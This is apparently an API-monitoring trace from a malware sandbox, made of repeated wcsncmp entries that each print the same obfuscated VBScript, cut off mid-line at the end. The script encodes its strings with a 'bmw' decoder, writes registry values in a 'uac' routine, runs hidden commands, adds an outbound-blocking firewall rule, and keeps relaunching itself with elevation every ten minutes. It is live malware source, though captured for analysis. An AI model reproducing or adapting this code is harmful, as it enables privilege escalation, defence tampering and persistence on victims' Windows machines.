bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.333] wcsncmp (_String1="y = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108 [0226.333] wcsncmp (_String1=" = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.333] wcsncmp (_String1="= CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.333] wcsncmp (_String1=" CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf 